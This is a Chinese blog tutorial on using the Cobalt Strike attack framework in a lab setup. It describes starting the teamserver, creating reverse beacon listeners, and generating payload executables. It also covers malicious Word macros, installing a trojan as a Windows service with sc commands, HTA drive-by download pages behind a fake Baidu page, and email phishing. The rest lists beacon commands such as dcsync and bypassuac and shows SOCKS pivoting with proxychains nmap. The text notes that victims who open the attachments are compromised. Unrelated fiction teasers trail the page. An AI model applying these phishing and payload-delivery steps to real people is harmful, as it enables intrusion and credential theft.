Cobalt strike的使用

Cobalt strike简介

Cobalt Strike是一款美国Red Team开发的渗透测试神器,常被业界人称为CS。它是渗透测试中不可缺少的利器。其拥有多种协议主机上线方式,集成了提权,凭据导出,端口转发,socket代理,office攻击,文件捆绑,钓鱼等功能。同时,Cobalt Strike还可以调用Mimikatz等其他知名工具,因此广受黑客喜爱。

Cobalt Strike分为客户端和服务端可分布式操作可以协同作战。但一定要架设在外网上。当然你知道利用这款工具主要用于内网渗透以及APT攻击。


实验环境:

1. 服务器端(Linux):192.168.60.6

2. 靶机(windows):192.168.60.65

3. 使用cobalt strike 4

4. 实验步骤

一.启动,连接服务器

- 启动服务端:

    - 关键的文件是teamserver以及cobaltstrike.jar,将这两个文件放到服务器上同一个目录,然后运行

    -  设置权限为777

    chmod 777 teamserver

    -  test 为待会靶机连接服务器的密码

**./teamserver 192.168.60.6 test**

- 客户端连接服务器

客户端在Windows、Linux、Mac下都可以运行 (需要配置好Java环境)。启动Cobalt Strike客户端,输入服务端的IP以及端口、连接密码,用户名可以任意设置。

    运行:cobalstrike.bat

启动客户端,输入ip,密码,端口,用户默认

成功连上服务器

如果客户端 是Linux操作系统则运行以下命令,启动客户端:

java -Dfile.encoding=UTF-8 -javaagent:CobaltStrikeCN.

jar -XX:ParallelGCThreads=4 -XX:+AggressiveHeap -XX:+UseParallelGC -jar cobaltstrike.jar

二.让主机上线

- 创建监听器

点击 Cobalt Strike -> Listeners->Add,其中内置了八个Payload,

wndows/beacon_dns/reverse_dns_txt

windows/beacon_http/reverse_http

windows/beacon_https/reverse_https

windows/beacon_bind_pipe

windows/beacon_tcp

windows/beacon_extc2

windows/foreign/reverse_http

windows/foreign/reverse_https

windows/beacon为内置监听器,包括dns、http、https、smb、tcp、extc2六种方式的监听器;windows/foreign为外部监听器。

- 创建payload 让主机上线

- 运行该exe主机成功上线:可以查看上线主机的磁盘信息,进行端口扫描,查看进程等信息。同理如果将生成的artifact.exe作为附件发送给其他人,只要有人点击,则他的机器会上线。

可以查看上线主机的磁盘信息,进行端口扫描,查看进程等信息。同理如果将生成的artifact.exe作为附件发送给其他人,只要有人点击,则他的机器会上线。不过现在的电脑都装 了杀毒软件,所以payload需做免杀。这个后续在研究。

三. 结合metasploit,反弹shell

在kali中使用命令开启metasploit,然后设监听端口,我这里设置的是65端口,可以任意设置

**msfconsole**![在这里插入图片描述](https://img-blog.csdnimg.cn/20200823191537803.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl81MDEzMDg1OQ==,size_16,color_FFFFFF,t_70#pic_center)

在靶机中

使用Cobalt Strike创建一个windows/foreign/reverse_http的Listener。其中ip为Metasploit的ip地址,端口为Metasploit所监听的端口。

选中刚刚新建msf

这样我们就可以利用metaspliot中的相关工具,进行进一步渗透。

如果有其他的主机上线,在派生会话中选择msf,该上线主机也能反弹shell,这样我们就可以利用metaspliot中的相关工具,进行进一步渗透。

四.office宏payload应用

第一步、生成office宏

第二步,把cs生成的代码放到word宏里面去

注意:做试验的时候,宏的位置不要设置所有的活动模板和文档,建设应用在当前文档,不然本机所有word文档运行都会种上你的木马,另外打开word文档有宏提示,一般是word默认禁用所有宏(文件—选项—信任中心—信任中心设置里面配置)。

当别人运行该word,就会成为肉鸡上线。

五.Https Payload应用

优点:可能过行为查杀、另外administrator运行可直接提升为system权限

第一步、生成木马,选择Windows service EXE

第二步:创建服务

Sc create test binpath= ”c:\test.exe” start= auto displayname= ”test”

Sc start test

Sc delete test

Sc top test

六.信息收集

1、打开信息收集然后输入想伪造的地址

2、然后就可以生成一个地址

3、可以通过https://bitly.com生成url短链接

http://tool.chinaz.com/tools/dwz.aspx

4、当别人访问这个链接的时候,就可以在应用信息里看到他的一些信息

七.hta网页挂马

HTA是HTML Application的缩写(HTML应用程序),是软件开发的新概念,直接将HTML保存成HTA的格式,就是一个独立的应用软件,与VB、C++等程序语言所设计的软件界面没什么差别。

下例代码保存为xx.hta:

<html>

<head>

<title>Title of page</title>

</head>

<body>

This is my first homepage.

<b>This text is bold</b>

</body>

</html>

第一步:生成hta

第二步:使用文件下载

点击开始之后,evil.hta文件会自动传到cs uploads目录。

如果之前设置过钓鱼页面,记得一定要删掉,不然会克隆的时候会报错

当别人访问的时候就会来到伪造的百度界面,从而下载小马。

八.邮件钓鱼

1、打开邮件钓鱼界面

2、注意,目标邮件内容

3、输入邮箱地址,邮件内容,附件等内容

九.beacon控制台的基本使用

beacon控制台的基本使用

基本参数:

beacon> help

Beacon Commands

-------                    -----------

**argue**                //进程参数欺骗

**blockdlls**              // 阻止子进程加载非Microsoft DLL

**browserpivot**              //注入受害者浏览器进程

**bypassuac**              // 绕过UAC提升权限

**cancel**                  // 取消正在进行的下载

**cd**                        //切换目录

**checkin**                  //强制让被控端回连一次

**clear**                  //  清除beacon内部的任务队列

**connect**                // Connect to a Beacon peer over TCP

**covertvpn**              // 部署Covert VPN客户端

**cp**                        //复制文件

**dcsync**                    //从DC中提取密码哈希

**desktop**                // 远程桌面(VNC)

**dllinject**              // 反射DLL注入进程

**dllload**                  //使用LoadLibrary将DLL加载到进程中

**download**                  //下载文件

**downloads**              //  列出正在进行的文件下载

**drives**                    //列出目标盘符

**elevate**                // 使用exp

**execute**                  //在目标上执行程序(无输出)

**execute-assembly**        // 在目标上内存中执行本地.NET程序

**exit**                      //终止beacon会话

**getprivs**                // Enable system privile

十.Socks代理应用

第一步:设置代理端口

第二步:查看已搭建代理

第三步:利用msf模块直接攻击


setg Proxies socks4:192.168.0.106:6677

也可以使用下面方法:

开启socks4a代理,通过代理进行内网渗透

开启socks,可以通过命令,也可以通过右键Pivoting->SOCKS Server

beacon> socks 2222

[+] started SOCKS4a server on: 2222

[+] host called home, sent: 16 bytes

然后vim /etc/proxychains.conf ,在文件末尾添加socks4代理服务器

使用proxychains代理扫描内网主机  proxychains nmap -sP 192.168.183.0/24

## 十一.cs提权与内网渗透

脚本下载地址:

https://github.com/rsmudge/Elevatekit

https://github.com/k8gege/aggressor    //k8内网渗透,提权

https://k8gege.org/Download/

插入脚本

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 159,117评论 4 362
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 67,328评论 1 293
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 108,839评论 0 243
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 44,007评论 0 206
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 52,384评论 3 287
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 40,629评论 1 219
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 31,880评论 2 313
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 30,593评论 0 198
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 34,313评论 1 243
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 30,575评论 2 246
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 32,066评论 1 260
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 28,392评论 2 253
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 33,052评论 3 236
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 26,082评论 0 8
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 26,844评论 0 195
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 35,662评论 2 274
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 35,575评论 2 270